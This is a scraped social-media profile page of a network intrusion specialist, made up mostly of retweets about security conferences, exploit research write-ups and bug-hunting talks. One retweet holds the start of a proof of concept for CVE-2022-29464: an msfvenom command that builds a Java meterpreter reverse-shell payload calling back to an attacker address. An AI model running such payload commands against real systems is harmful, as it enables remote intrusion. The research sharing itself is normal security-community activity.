antic0de Profile
antic0de

@antic0de

Followers
9K
Following
607
Media
14
Statuses
3K

Network Intrusion Specialist

Joined October 2008
Don't wanna be here? Send us removal request.
@antic0de
antic0de
2 years
So ends an era of the New Zealand scene that lasted well over a decade. Shout outs to all of the people who worked to contribute to this epic period of history. Congrats of course to those founders and owners that made it through to this point. Waiting now for the next wave.
0
0
14
@antic0de
antic0de
3 years
RT @haroonmeer: The first 15 minutes of this weeks @riskybusiness is why we build @ThinkstCanary (and why it works). - Attackers know ther….
0
4
0
@antic0de
antic0de
3 years
RT @dozernz: The Aruba AP CLI support password calculation script from my #defcon30 presentation is available here:.
Tweet card summary image
github.com
Supporting material for the "Hunting Bugs In The Tropics" DEFCON 30 talk - dozernz/bugstropics
0
9
0
@antic0de
antic0de
3 years
RT @OctagonNetworks: Can you bypass authentication by exploiting a vulnerability? 10$ for first solver! 💢🔥 . https:….
0
109
0
@antic0de
antic0de
3 years
RT @CyberCX: Congrats to our team members selected to join Team Oceania at the inaugural International #Cybersecurity Challenge. CyberCX is….
0
1
0
@antic0de
antic0de
3 years
RT @0xJeremy: From a VR student today on our ROP chain lessons. I'm dying 😂:."This week's been like"
0
638
0
@antic0de
antic0de
3 years
RT @wvuuuuuuuuuuuuu: CVE-2022-29464 PoC for this in two commands. 1. msfvenom -p java/meterpreter/reverse_tcp -f war lhost=192.168.0.6 |….
0
77
0
@antic0de
antic0de
3 years
RT @mdowd: My offensivecon 2022 keynote “rules to hack by” is now available on video at the link below.
0
53
0
@antic0de
antic0de
3 years
RT @snyff: If you are using JWT+Java+EC, you should probably grep your logs for MAYCAQACAQA.
0
12
0
@antic0de
antic0de
3 years
RT @CaptMeelo: I have been playing with KernelCallbackTable process injection lately and here's something I wanted to share. #redteam #mald….
Tweet card summary image
captmeelo.com
A walkthrough on how I made KernelCallbackTable process injection work according to what I wanted.
0
153
0
@antic0de
antic0de
3 years
RT @kawaiiconNZ: Launch Update: Kawaiicon 2 are continuing to target July 1-2 2022 for launch. ✨Wave 1 of ticket sales to open midday Frida….
0
36
0
@antic0de
antic0de
3 years
RT @mdowd: A few people commented that it was annoying having to login to SlideShare to d/l, so I've made them available on github here: ht….
Tweet card summary image
github.com
Contribute to mdowd79/presentations development by creating an account on GitHub.
0
16
0
@antic0de
antic0de
3 years
RT @33y0re: 12 ROP chains later - from CVE-2019-0567 crash POC to code execution. ASLR, DEP, & CFG bypass + ACG bypass using (since-patche….
0
84
0
@antic0de
antic0de
3 years
RT @chompie1337: Thrilled to share my new blog post: Put an io_uring on it: Exploiting the Linux kernel. Follow me while I learn a new kern….
0
606
0
@antic0de
antic0de
3 years
RT @_arkon: Guys & girls!.Exactly a year ago I promised over 15 bugs in win32k. You're welcome to read and find out about my biggest resear….
0
338
0
@antic0de
antic0de
3 years
RT @tmpout: We are pleased to announce tmp.0ut Volume 2.
Tweet media one
0
574
0
@antic0de
antic0de
3 years
RT @alvaroprieto: Ever wanted to debug your microcontroller over USB-C?.(I'm talking JTAG/SWD, not just USB!) If you already have a USB-C c….
0
155
0
@antic0de
antic0de
3 years
RT @CrikeyCon: The show will go on! Droppy has secured a new lair for #CrikeyCon at the RNA Showgrounds on 3rd September! Check https://t.c….
crikeycon.com
CrikeyCon X
0
12
0
@antic0de
antic0de
4 years
RT @emil_lerner: I just posted a write-up on how I leaked uninitialized memory (e.g., other users' HTTP requests/responses) from Fastly usi….
Tweet card summary image
medium.com
The post go through a QUIC (HTTP/3) implementation bug in the H2O webserver. The bug is interesting as it affected Fastly, a well-known…
0
268
0